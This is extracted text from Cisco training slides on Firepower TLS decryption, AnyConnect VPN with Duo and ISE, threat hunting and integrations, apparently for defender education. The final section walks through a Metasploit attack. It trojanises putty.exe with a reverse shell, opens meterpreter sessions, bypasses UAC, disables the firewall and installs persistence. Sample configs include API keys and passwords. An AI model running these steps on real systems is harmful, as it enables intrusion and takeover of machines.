3. Install the certificate
4. Create “SSL Policy” to Access
Control Policy
5. Deploy Policy
6. Test

• A CA certificate that is issued by

another CA
• It is signed by either another
intermediate CA or by a root CA
• Intermediate CAs can sign server
certificates in exactly the same way a
root CA can
• Subject Type = CA
• Key Usage = Certificate Signing
• Issuer = the CA CN

• FTD needs an intermediate CA certificate to be installed for

TLS decryption
• Not a WEB SERVER CERTIFICATE, TAC will say thank you for this! ☺

• After receiving the HTTPS Request, FTD will fetch the server
certificate from the destination
• It will create a new certificate with (nearly) all the fields and
sign this with her own certificate
• CRL is not replicated because it would not match the “new”
certificate

• Client needs to trust the certificate from FTD

• Use a trusted Enterprise subordinate CA certificate or roll out your
self-signed cert to the clients via GPO

FTD
Client Server
Client Hello
Proxied Client Hello

Server Hello / Certificate and key

Server (proxy) Hello / exchange / Server Hello Done
Proxy Certificate and key exchange
/ Server (Proxy) Hello Done
Client Key Exchange / Change
Cipher Spec / Finished Client Key Exchange / Change
Cipher Spec / Finished
Change Cipher Spec /
Change Cipher Spec /
Finished
Finished

HTTP Request HTTP Request

It replaces the key ONLY in the Self-

Signed Certificate, instead of the whole
Action: Decrypt certificate
and Resign It causes the client browser does warn
that the certificate is self-signed

• How could we control a domain in a policy? URL is encrypted, not visible yet!

• How could we control a domain in a policy? URL is encrypted, not visible yet!
• You can use the DN/CN of the cert: (CN != URL)

SSL Rule Condition Data Present In SSL Rule Condition Data Present In

Zones ClientHello Categories ClientHello

(Server Name Indicator extension)
Networks ClientHello
Certificate Server Certificate (potentially cached)
VLAN Tags ClientHello
Distinguished Names Server Certificate (potentially cached)
Ports ClientHello
Users ClientHello Certificate Status Server Certificate (potentially cached)

Applications ClientHello Cipher Suites ServerHello

(Server Name Indicator
extension) Versions ServerHello

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 560
Global TLS/SSL Rule Default action
Settings could be :
• Do not decrypt
• Block
• Block with
• Configurable actions on these reset
undecryptable cases:
• TLS Compression
• SSLv2
• Unknown or unsupported Cipher
Suite
• Uncached session ID
• Handshake or decryption error
Field in
Certain unsecure cipher Connections Events
Handshake error:
suites are not supported
Sign of TLS
when TLS hardware
Oversubscription
acceleration is enabled

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 561
Trusted CA Certificates
and CRL
• You reference that trusted CA object(s)
in an SSL policy
• You can upload CRLs to a trusted CA
object, supported formats: DER, PEM
• You can control encrypted traffic
whether the CA subsequently revoked
the certificate
• No limit to the number of CRLs
• Add CA who signed the CRL

Very useful;
Default = No TLS info

• If you need to “DROP” a category in NGFW rules

the access policies, good to also drop
it in the TLS/SSL Decryption Policies
• HTTPS request is otherwise decrypted App ID
detection
first and then matched against access
policies
Packet, TCP
• This will give a performance gain stream
processing

Decrypt if
TLS

Data acquisition

• From 6.1: The system now displays an

HTTP response page for connections
decrypted by the TLS policy, then
blocked by access control rules
• However, the system does not display
a response page for encrypted
connections blocked by access control
rules (or any other configuration)
• FTD cannot support EUN for bad
certificates now

Certain unsecure cipher suites are not

supported when TLS hardware
acceleration is enabled

Switch ON logging
(Default: No logging)

FTD with CA generated

key/certificate used to resign
modified server certificate

Expired
Modified server cert server cert
Client Server

• Certificate status as a policy condition:

• Revoked, self-signed, not yet valid,
expired, invalid issuer, invalid signature,
valid

• Cipher suite, TLS version as policy

conditions:

If the certificate
matches any of the
selected statuses, the
rule matches the traffic

• Test with non trusted cert:

• Log:

• HSTS is a web security policy

mechanism which helps to protect
websites against protocol downgrade
(HTTPS->HTTP) and MiTM attacks
• Browser dependent
• Does not protect if you've never visited
the website before

Users cannot click through warnings, automatically turn any

http:// links into https:// links ; If the secure connection cannot be
assured (ex: self signed certificate is used), do not allow the user
to override
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 585
Certificate Pinning

• Cert Pinning is the process of associating a host with their expected X.509
certificate(s) or public key, hard-code in the client/app the TLS/SSL cert(s) known to
be used by server
• No rogue CA, example: google services from Chrome 13, mobile apps, twitter,
box.com, ...
• Trust-On-First-Use (TOFU) mechanism able to detect and prevent a MITM attacks

FTD with CA generated

key/certificate used to resign
modified server certificate

Modified server cert

• Supported modes: transparent, routed, in-line set

• Passive and Inline TAP can only decrypt using “known key” modes
• No Decrypt Resign, no Diffie-Hellman Enhanced and ECDHE ciphers

• FTD can decrypt TLS/SSL only

• For TLS 1.3: Downgrade service
• You cannot decrypt everything (cert pinning, HSTS, …)
• Decrypt-resign mode requires intermediate CA cert
• CRL management is critical
• Switch ON the TLS decryption log and info in the Connection Events

ISP
• TLS/IPsec AnyConnect access
• Split Tunneling or Backhauling to
handle traffic from remote uses to Internet
Internet Edge

• AMP/ File and IPS inspection

policies
• Application level inspection
NGFW in HA

• Easy Wizard to configure RA VPN

Private Network

• FTD version 6.2.2 and later • Cisco AnyConnect from 4.x

• RA VPN protocols:
• Transport Layer Security (TLS)
• Internet Key Exchange version 2 (IKEv2)

• Service and code came from ASA

Trustpoint XML profile, IP pool, RADIUS or LDAP server

RA VPN /Cert AnyConnect image (optional, client cert can
Routed
be used)
interface Smart License in cloud:
FMC (FDM also can AnyConnect license
support RA VPN) FMC
(Plus, Apex, VPN-Only)
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 592
For Your
Supported RA VPN Features on FTD Reference

• IPv4 & IPv6. All • AAA • VPN Tunneling

combinations • Server authentication using • Address assignment
self-signed or CA-signed
• Both FMC and FDM, Device • Split tunneling
identity certificates
specific overrides • Split DNS
• AAA username and password-
based remote authentication Client Firewall ACLs
• Both FMC and FMC HA •

using RADIUS or LDAP/AD Session Timeouts for maximum

environments •

• RADIUS group and user connect and idle time

• Multiple interfaces and authorization attributes, and
multiple AAA servers RADIUS accounting • Monitoring
• NGFW Access Control • VPN Dashboard Widget
• From 6.3: integration using VPN Identity • RA VPN events including
• ISE posture, RADIUS CoA From: 6.4:
•
• Tunnel statistics available (CLI)
• RADIUS timeout (MFA with • Secondary Authentication
Duo)
• From 6.5:
• Remote access VPN two-factor
authentication using Duo LDAP
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 593
For Your
Currently (6.5) Unsupported Features Reference

on FTD
• Dynamic Access Policy • AnyConnect • Simultaneous IKEv2
customization dynamic crypto map for
• Host Scan RA and L2L VPN
• AnyConnect scripts
• VPN load-balancer • AnyConnect modules
• AnyConnect localization (NAM, Hostscan, AMP
• Local authentication
(FDM can support it from • Per-app VPN Enabler etc.) – DART is
6.3) installed by default
• SCEP proxy
• LDAP attribute map • TACACS, Kerberos (KCD
• WSA integration Authentication and RSA
• SAML SSO SDI)
• Browser Proxy

• Access interfaces – determine interfaces to be used by RA VPN

• SSL settings, such as access ports, IKEv2 settings such as certificate

• AnyConnect image – client package to be installed on the endpoint

• AnyConnect client profile – XML can be uploaded into the FMC as file object
• Referenced in the group policy and downloaded to the endpoint while the VPN connection is
initiating and includes parameters for the AnyConnect client
• Profile Editor – stand-alone Windows tool

• Connection profiles – determine how authentication is performed

Connection
Profiles

• Group policies – a set of user-oriented attribute/value pairs for RA VPN users

• DNS/WINS, SSL/DTLS, timeouts, client bypass protocol and DHCP network scope
• Split tunnel and split DNS configuration, VPN filter, egress VLAN and client firewall rules
• AnyConnect client profile, SSL/DTLS settings and connection settings

1. Create a certificate used for server authentication (for production)

2. Configure RADIUS or LDAP server for user authentication (no local auth yet,
optional, client cert is supported)
3. Create pool of addresses for VPN users (optional, wizard helps)
4. Creating XML profile (optional, Profile Editor can be used)
5. Upload AnyConnect images for different platforms (optional, wizard helps)

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 607
RADIUS Server (like
ISE) can change it with
RADIUS CLASS
attribute IETF-Class-
25 (OU= group-policy-
name)
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 609
“outside-zone” is a
zone and FTD’s
outside interface is a
member

New in 6.3, earlier:

configured ACL or
“sysopt permit-vpn”
command in
FlexConfig

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 610
After Wizard Configuration
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 611
NAT For RA VPN Users

• Order matters:
• No NAT towards RA VPN users
• PAT for the rest of traffic
RA VPN_address_pool

outside inside_subnet

• Bypass Access Control policy for decrypted traffic (sysopt permit-vpn) checkbox:
• If you check this checkbox, the VPN traffic into the internal network will bypass Snort
(no IPS, AMP and others)

outside Inside with

inside_subnet

• URL syntax:
• https://<FTD-outside-IP>/alias

• Web Access URL points to the profile

directly:

• Open a browser, type DNS name or IP address pointing to the outside RA VPN
interface
• You will then have to login using credentials and follow instructions on the screen
• It will install AnyConnect and connect automatically

• ISE as a RADIUS Server can configure • Monitor:

“Class” in Authorization Profile • FMC: Analysis > Users > User Activity

• FTD CLI

ftd# sh vpn-sessiondb anyconnect

...
Bytes Tx : 48523 Bytes Rx : 23920
Group Policy : SecureGroupPolicy Tunnel Group : ISE-
posture

• Started as a multi-factor authentication (MFA) and

later Zero Trust Security with device posture,
adaptive authentication and SAML (Security
Assertion Markup Language) support
• Policy decision point: cloud only
• 3 different methods for ASA RA VPN and FTD can
support 2 methods from 6.3 (RADIUS proxy, LDAPs)
now
• More information:
• Application and User-centric Protection with Duo Security,
BRKSEC-2382, Tuesday 11.00AM

RADIUS

FTD
VPN

On premise

• Install Windows or Linux as an admin account

• Config file: conf\authproxy.cfg Primary authentication options:
• Log file: log\authproxy.log 1. AD account (LDAP/LDAPS)
Port: 389 or 636 if using LDAPS
[ad_client]
host=<AD-IP-address>
service_account_username=admin 2. RADIUS: [radius_client] section
service_account_password=C1sco12345 Port: Typically 1812, but any
search_dn=CN=Users,DC=mydomain,DC=com unused port is acceptable

[radius_server_auto] Secondary authentication:

ikey=D94FBB987I8KUTK5556Z Duo account in the cloud
skey=F0E47ItOrET0c8jE7gxaxQcJnRb7VObjQc9rbOTw
api_host=api-1506c3ct.duosecurity.com

radius_ip_1=10.1.1.40 FTD as a RADIUS client

Users need
longer
Timeout

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 629
FTD RA VPN with Duo
Security Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 631
FTD RA VPN with
RADIUS Change of
Authorization, CoA
FTD from 6.3 with RADIUS Change of
Authorization, CoA
• AnyConnect client connects to FTD and ISE authenticates it
• ISE tells FTD to restrict access to limit communications to
• Permit traffic to ISE for compliance checking
• Permit traffic to remediation servers (AV servers, download hotfixes…)

Permit to ISE
Permit to Remediation Request
Deny any File Server

Remediation
Accept, dACL I Server
S
URL-redirect E

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 633
FTD from 6.3 with RADIUS Change of
Authorization, CoA (Cont.)
• AnyConnect is redirected to ISE for compliance checking
• Client remediates if necessary (AV update, Hotfix, Program Launched)

Permit to ISE Remediation

Permit to Remediation
Deny any File Server

Remediation
I Server
Control S
E

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 634
FTD from 6.3 with RADIUS Change of
Authorization, CoA (Cont.)
• When client is compliant, ISE sends Change of Authorization (CoA, RFC 3576)
message which makes FTD apply new authorization (permit traffic to internal
networks)

Permit to ISE
Permit to Remediation
Deny any File Server

Remediation
CoA Policy I Server
S
Push, dACL E

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 635
FTD from 6.3 with RADIUS Change of
Authorization, CoA (Cont.)
• When client is compliant, ISE sends Change of Authorization (CoA, RFC 3576)
message which makes FTD apply new authorization (permit traffic to internal
networks)

Permit to any
File Server

Remediation
I Server
S
E

• Objects > Object Management > Access List > Extended

Negative logic:
block == do not redirect
permit == redirect
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 637
FMC: Add RADIUS CoA Server
FTD listens for CoA messages
on this interface
• Objects > Object Management > RADIUS Server Group

Inside
interface
Dynamic Authorization= CoA, Redirect ACL
default port: UDP/ 1700, RFC
standard: 3799

• dACL:
• dACL has higher priority
• Do not expect URL redirect helps if dACL
drops the traffic

• SGT:
• SGT assignment to an RAVPN as a part of
the static authorization result was already
supported in FTD 6.2.3; FTD 6.3 adds
dynamic authorization with CoA
• There is still an enhancement request for
considering the assigned SGT in local permit ISE, REMEDIATION, DNS
policies permit ICMP
deny INTERNAL NETWORK
permit INTERNET
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 640
FTD RA VPN with
RADIUS CoA / ISE
Posture Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 642
FTD RA VPN with Duo
and RADIUS CoA
RAVPN with Duo and Posture
Duo
RADIUS
Proxy

AD
RADIUS
Duo Cloud
I
S
E
ISE

RADIUS

FTD
VPN

On premise

ISE as an Authentication
AND Authorization
Server

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 645
FTD RA VPN with
Duo MFA and ISE
Posture Demo
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 648
RA VPN with Duo
and LDAPS
RAVPN with LDAPS
ISE AD

Duo Cloud I
S
E

LDAPS
RADIUS

FTD

VPN On premise

• Like with ASA, in connection Profile >

AAA tab, option to enable secondary
authentication
• It can be either Realm (AD/LDAP) or
RADIUS Server Group

Duo options: push, sms, phone

• Username for the secondary

authentication can be provided in one
of three ways:
• Prompt (User should enter the username
upon login)
• Use the username provided in the primary
authentication
• Prefill the username from the client
certificate

• You can choose between primary and

secondary username as VPN session
username

System > Integration > Realms

Encryption: LDAPS,
“Test”

Directory Username, Base DN and Group DN:

dc=INTEGRATION_KEY,dc=duosecurity,dc=com
Directory Password will be the Secret Key.

• FTD should resolve duosecurity.com

domain alone, therefore DNS
configuration is needed

LDAPS

Duo RADIUS
Proxy

RADIUS

FTD

VPN On premise

• Authentication: Client AND AAA

• AAA: Duo Auth Proxy
• Prefill username from certificate
• Hide username in login window

[duo_only_client] There is NO primary authentication

[radius_server_auto] Secondary authentication:

ikey=DIAHEPCGVZFPDLVHH9PL
skey=g4VC01AqffKnH9pxEwfvg8SFsaBu3ot6FY
Duo account in the cloud
api_host=api-1301c7df.duosecurity.com

radius_ip_1=198.19.10.1
radius_secret_1=C1sco12345 FTD as a RADIUS client
failmode=safe
client=duo_only_client

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 661
FTD RA VPN with
Certificate and
Duo MFA Demo
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 664
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 665
Monitoring of RA
VPN Connections
Monitoring of RA VPN Connections

• VPN Server side monitoring: show > show vpn-sessiondb anyconnect

commands
> show running-config tunnel-group Session Type: AnyConnect
tunnel-group DefaultWEBVPNGroup general-attributes
address-pool VPN-Pool1
authentication-server-group RADIUS_SERVERS Username : remote1 Index :
authorization-server-group RADIUS_SERVERS 27432
accounting-server-group RADIUS_SERVERS Assigned IP : 10.1.1.121 Public IP :
tunnel-group VPN-profile type remote-access 10.61.97.108
tunnel-group VPN-profile general-attributes Protocol : AnyConnect-Parent SSL-Tunnel DTLS-
address-pool VPN-Pool1 Tunnel
authentication-server-group RADIUS_SERVERS License : AnyConnect Premium
authorization-server-group RADIUS_SERVERS Encryption : AnyConnect-Parent: (1)none SSL-Tunnel:
accounting-server-group RADIUS_SERVERS (1)AES-GCM-256 DTLS-Tunnel: (1)AES256
tunnel-group VPN-profile webvpn-attributes Hashing : AnyConnect-Parent: (1)none SSL-Tunnel:
group-alias VPN-profile enable (1)SHA384 DTLS-Tunnel: (1)SHA1
Bytes Tx : 31690 Bytes Rx : 1

Wrongly configured RADIUS

Server

• RA VPN • From 6.4:

• It was introduced in version 6.2.2 • Secondary Authentication
• Both IKEv2 and TLS • From 6.5:
• Wizard
• Two-factor authentication using Duo LDAP
• From 6.3:
• RADIUS timeout (MFA)
• RADIUS CoA

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 673
Threat Hunting
Part I
“The only true wisdom is in knowing
you know nothing” - Socrates
• Where to start?
• Which tool(s) to use?
• What information needed?
• How to connect the dots?

• Today’s Tools
• Firepower Threat Defense (IPS, AMP)
• Threat Grid
• AMP for Endpoints
• Email Security
• Threat Response

Security Operations Technologies and Intelligence

Secure
Enterprise Endpoint
Why? How? Internet
Firewall Security
Gateway
Has it
Is it bad? affected Network Web Malware
us? IPS Security Analytics

Traffic Email Identity

Analytics Security Context

3rd party 3rd party Threat

SIEM Sources Intel

SecOps

Key pillar of Cisco’s integrated

security architecture

• Automates integrations across Cisco

security products
• Reduces the time and effort spent on
key security operations functions:
▪ Detection
▪ Investigation
▪ Remediation

Firepower
You’re entitled to Threat AMP for Threat Email Stealth
Umbrella Threat
Response if you own Endpoints Grid Security watch
Defense
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Cisco Threat Response in action
Three simple ways to get started

Manual or
1 Intelligence Sources
Investigate
(search interface)
Casebook via Browser
2 Plug-In

3 High-Fidelity Events Incident Manager

Observables:
Firepower
• File hash AMP for Email Stealth Cisco Umbrella Threat Virus
Umbrella Threat
• IP address Endpoints Security watch Talos Investigate Grid Total
• Domain Defense
• URL • Have we seen these observables? Where? • Are these observables suspicious or
• Email • Which endpoints connected to the domain/URL? malicious?
• Etc.

• Send supported events from FTD devices to CTR for analysis alongside data from
your other products and other sources
• Regional Clouds
• North America
• Europe
• Asia (APJC) -> Firepower integration is not currently supported
Feature Managed by FMC Managed by FDM
6.3 and later (via syslog) 6.3 and later (via syslog)
Intrusion (IPS) events
6.4 and later (via direct connection) 6.4 and later (via direct connection)
Connection events (all) Not supported 6.5
Connection events (high priority only)
Security Intelligence connection events
Connection events related to file and malware events
6.5 Not supported
Connection events related to intrusion events

File and malware events 6.5 6.5

• Beginning in Firepower release 6.3, you can use syslog to send supported events to
the Cisco cloud
• Set up an on-premises Cisco Security Services Proxy (CSSP) server and configure
your devices to send syslog messages to this proxy
On Premise Cloud

API
syslog Cisco Security https Security Services Threat
NGFW (SSE)
Services Proxy Exchange Response

• FTD 6.3 • Virtual Machine • Automatically or • Promoted Incidents

• FTD 6.4 & 6.5 (ISO Image) manually promote appears in CTR
where the unit • Registers as a SSE Incidents
does not have Device
Internet • Every 10 minutes,
connectivity forwards collected
events to SSE

• Beginning in Firepower release 6.4, you can configure your Firepower system to
send supported events directly to the Cisco cloud
• Firepower devices send events directly to Security Services Exchange

On Premise Cloud

API
https Security Services Threat
NGFW (SSE)
Registers to SSE as a Exchange Response
Device, by the way of
Cisco Smart Licensing • Automatically or • Promoted Incidents
• FTD 6.4 & 6.5
unit that have manually promote appears in CTR
direct Internet Incidents
connectivity

• IPS, File, Malware and High Priority Connections Events transmitted to regional cloud

Regional Cloud Selector Event Type Selection

High priority connection events include:

• Security Intelligence connection events
• Connection events related to file and malware
events
• Connection events related to intrusion events
© 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public
Add Firepower Module to CTR

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 685
Start with an IPS Event
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 687
Do we already know more?

• Source IP: 192.168.249.111

• Hostname ALEXA-WIN10
• AMP for Endpoint installed
• MAC 00:50:56:b8:86:5e

• Destination IP: 31.210.117.131

• Poor Talos Intelligence reputation score
• Resolved To 31-210-117-131.turkrdns.com
• No Sighting for Malicious Domain

• 2 File Hash‘s connected to the Malicious IP

• 6cf7e427ab52ea95214cbd937a21cd8e8a4e80f1ef2c53cd8cb83c88a5436aee
• 8ec4b6188a91ad6828e883ed3be9fa5f461d38fcf896f4641833965d1b8b968b

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 688
go down the rabbit hole
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 690
…gain more insights

• openme.com connected to the

Malicious IP on Port 1666
• 6cf7e427ab52ea95214cbd937a21cd8e8a4
e80f1ef2c53cd8cb83c88a5436aee

• openme.com connected to the

Malicious IP on Port 1666
• 6cf7e427ab52ea95214cbd937a21cd8e8a4
e80f1ef2c53cd8cb83c88a5436aee

• powershell.exe executed
„openme.com“ as command
• C:\Users\Alexa\Downloads\Urgent\openMe.
com -A -w1000 31.210.117.131 1666 GET
/ HTTP/1.1

• openme.com connected to the

Malicious IP on Port 1666
• 6cf7e427ab52ea95214cbd937a21cd8e8a4
e80f1ef2c53cd8cb83c88a5436aee

• powershell.exe executed
„openme.com“ as command
• C:\Users\Alexa\Downloads\Urgent\openMe.
com -A -w1000 31.210.117.131 1666 GET
/ HTTP/1.1

• explorer.exe executed powershell.exe

to run a script
• C:\Users\Alexa\Documents\DemoTools\Inci
dentManager\createData.ps1

• openme.com connected to the

Malicious IP on Port 1666
• 6cf7e427ab52ea95214cbd937a21cd8e8a4
e80f1ef2c53cd8cb83c88a5436aee

• powershell.exe executed
„openme.com“ as command
• C:\Users\Alexa\Downloads\Urgent\openMe.
com -A -w1000 31.210.117.131 1666 GET
/ HTTP/1.1

• explorer.exe executed powershell.exe

to run a script
• C:\Users\Alexa\Documents\DemoTools\Inci
dentManager\createData.ps1

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 694
Find the Origin
TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 696
Did we solved the riddle?
❓❓❓
• Started with an IPS – CNC Event to a malicious IP
❓❓
• Endpoint „ALEXA-WIN10“ was identified as Source ❓
• IPS Event was triggerd by an unkown File „openme.com“
• Explorer.exe started Powershell with a Script, which executed „openme.com“
• Email with „openme.com“ as Attachment was sent to „Alex“ corporate email address
• Email was Dropped by Content Filter „Sender Domain Reputation Filtering“

We just started with the investigation, what could be the

• Block and quarantine a • Block a domain • Isolate an affected host

file hash (AMP) (Umbrella) (AMP)

• Emergency response
• For incidents such as a data breaches or ransomware, we quickly address the most pressing concerns. We
build a plan to isolate the attacker, scope out and contain the situation, identify the root cause, and design
strategies to remedy the underlying issues

• Retainer
• With your retainer, our team is available even before an incident, with proactive services to strengthen your
security posture. If you do require emergency assistance, our responders are available within hours to begin
work virtually before they travel onsite.

• Proactive services
• Don't wait for an incident to occur to take action: Identify vulnerabilities before they impact your organization.
Our responders will work with your team to hunt for and address existing adversaries within your network.

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 702
and the Story continues…
For Your
There was an additional Unkown File Hash Reference
8ec4b6188a91ad6828e883ed3be9fa5f461d38fcf896f4641833965d1b8b968b

Outgoing connection Why two different Hashes

from „midyearbonus.exe“ for „explorer.exe“

RED PURPLE BLUE

TEAM TEAM TEAM

Offensive Defensive
Security Security

ATTACKER VICTIM DEFENDER

ask the
user nicely
to click on
it Firewall
• payload off sessiongoph
• c&c Email the Privilege Backdoor er
server payload! escalation add user schtasks responder

Recon Stage Deliver Exploit Install C&C pivot

threat email Endpoint: Cloud snort cloud IOCs

intelligen security Exploit IOCs rule
ce prevention splunk TCP View
retrospect
ion System Stealthwatch
protection
user
education* Process
explorer

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 709
Firepower
Integrations
FMC & FTD APIs And Integration Points
https://www.cisco.com/c/m/en_us/products/security/technical-alliance-partners.html
Threat Intelligence Director
• ThreatQ
• Hail a taxii
• Anomali SIEM
• Qualys • Insight
• Rapid 7 • Seclytics • IBM Qradar
• Tenable • NC4 • Splunk
• Greenbone • LogRhythm
• McAfee
• LogZilla
host input TID eStreamer • Arcsight

FMC
DB access Rest API
Security and Policy Orchestration
• Tufin
Host and event database
• Firemon
• Panaseer
• Algosec
• MicroFocus (Arcsight) API
• Firesec
• Crystal Report FTD • Ansible

• Stream events (intrusion, discovery, connection etc) to client application

• FMC is the eStreamer server, client is e.g. Splunk eNcore APP
• Client requests compact, binary encoded messages – high performance
• Communication is TCP based and secure (port 8302)

2. Pick any
1. Select an events password, just
remember it

3. Hostname/IP of
the eStreamer client

Download the certificate and upload to Splunk.

Rename the file to „client.pkcs12”

1. Have a fresh CentOS (or other Linux distribution) installation

2. Download Splunk (supported versions 7.3 – 7.2 – 7.1 - 7.0)
3. Install Splunk
4. Download and Setup “Cisco eStreamer eNcore Add-on for Splunk” APP for Splunk
5. Configure eStreamer on the FMC
6. Optionally install “Cisco Firepower App for Splunk”. It provides number of
dashboards

Install it

Click to get event details

Source IP Event description Destination port

Sensor IP Matches ACP Event message

• Download our favorite SSH client: putty.exe

tecsec2600# wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe

• Let's calculate SHA256

tecsec2600# sha256sum putty.exe
736330aaa3a4683d3cc866153510763351a60062a236d22b12f4fe0f10853582 putty.exe

• If user starts the application, it will open a backdoor connection to 192.168.77.77

tecsec2600# msfvenom -a x86 --platform windows -x putty.exe -k -p
windows/meterpreter/reverse_tcp lhost=192.168.77.77 lport=4444 -e
x86/shikata_ga_nai -i 3 -b "\x00\xFF" -f exe –o puttyLIVE.exe

Encoder Payload Bad characters Output file

• SHA256 looks different

tecsec2600# sha256sum putty*

736330aaa3a4683d3cc866153510763351a60062a236d22b12f4fe0f10853582 putty.exe
b8fe425ad09de7664fd5391bf72d6e61bf41d8aac7ca594d4f0ff9dec2f53b38 puttyLIVE.exe

root@red-kali:~/tecsec2600# cat revers.sh

• Start listening for those incoming connections
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.77.77
set LPORT 4444
run -j

tecsec2600# msfconsole -r revers.sh

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.77.77:4444

Multiple
recipients

Attachment

Create your own „story”

msf5 exploit(multi/handler) > [*] Sending stage (180291 bytes) to 192.168.34.34

[*] Meterpreter session 1 opened (192.168.77.77:4444 -> 192.168.34.34:50828)

Victim’s IP

msf5 exploit(multi/handler) > sessions -l

Active sessions
=============== PC/username
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows client34-PC\client34 @ CLIENT34-PC 192.168.77.77:4444 ->
192.168.34.34:50828 (192.168.34.34)

msf5 exploit(multi/handler) > sessions -i 1 Interact with session 1

[*] Starting interaction with 1...

meterpreter > sysinfo

Computer : CLIENT34-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x86/windows

meterpreter > getuid

Server username: client34-PC\client34 Non privileged access

TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 747
List The Items On The Desktop
meterpreter > shell
Process 2504 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]

C:\Users\client34\Desktop>

C:\Users\client34\Desktop>dir “cmd.exe”, run any command you like

Directory of C:\Users\client34\Desktop

01/11/2020 11:20 PM 1,425,408 puttyLIVE.exe

1 File(s) 1,425,408 bytes

C:\Users\client34\Desktop>netsh advfirewall set allprofile state off

netsh advfirewall set allprofile state off

The requested operation requires elevation (Run as administrator).

Find a known process. Try out

meterpreter > execute -f notepad.exe
to move to your AV process ☺

meterpreter > ps | grep notepad.exe

Filtering on 'notepad.exe’

Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
2436 1296 notepad.exe x86 1 client34-PC\client34 C:\Windows\SysWOW64\notepad.exe

meterpreter > migrate 2436

[*] Migrating from 1296 to 2436...
[*] Migration completed successfully.

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

msf5 exploit(windows/local/bypassuac) > set session 1
msf5 exploit(windows/local/bypassuac) > set lport 5555
msf5 exploit(windows/local/bypassuac) > run

[*] Started reverse TCP handler on 192.168.77.77:5555

[+] BypassUAC can bypass this setting, continuing... Bypassing UAC
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Sending stage (180291 bytes) to 192.168.34.34
[*] Meterpreter session 2 opened (192.168.77.77:5555 -> 192.168.34.34:50887

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
2. After
Server username: NT AUTHORITY\SYSTEM TECSEC-2600 © 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public 751
Let’s Try To Turn Off Windows Firewall, again! ☺

meterpreter > shell

C:\Windows\system32>netsh advfirewall set allprofile state off

Ok.

Name Run it every 5 min

schtasks /create /tn "checkNET" /sc minute /mo 5 /tr

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -
ExecutionPolicy ByPass -File
C:\Users\client34\Downloads\checknetICMP.ps1"

Use PowerShell to run the script

meterpreter > run persistence -A -L c:\\ -X 30 -p 6666 -r 192.168.77.77

[*] Running Persistence Script

/root/.msf4/logs/persistence/CLIENT34-PC_20200111.1833/CLIENT34-
PC_20200111.1833.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.77.77
LPORT=6666
[+] Persistent Script written to c:\\NvdcOgvELQso.vbs Drop a script
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[*] Executing script c:\\NvdcOgvELQso.vbs
Execute it
[+] Agent executed with PID 4388
[*] Installing into autorun as
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ghMHVLHJj Registry entry
[+] Installed into autorun as
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ghMHVLHJj
meterpreter > [*] Meterpreter session 3 opened (192.168.77.77:6666 ->
192.168.34.34:50914)

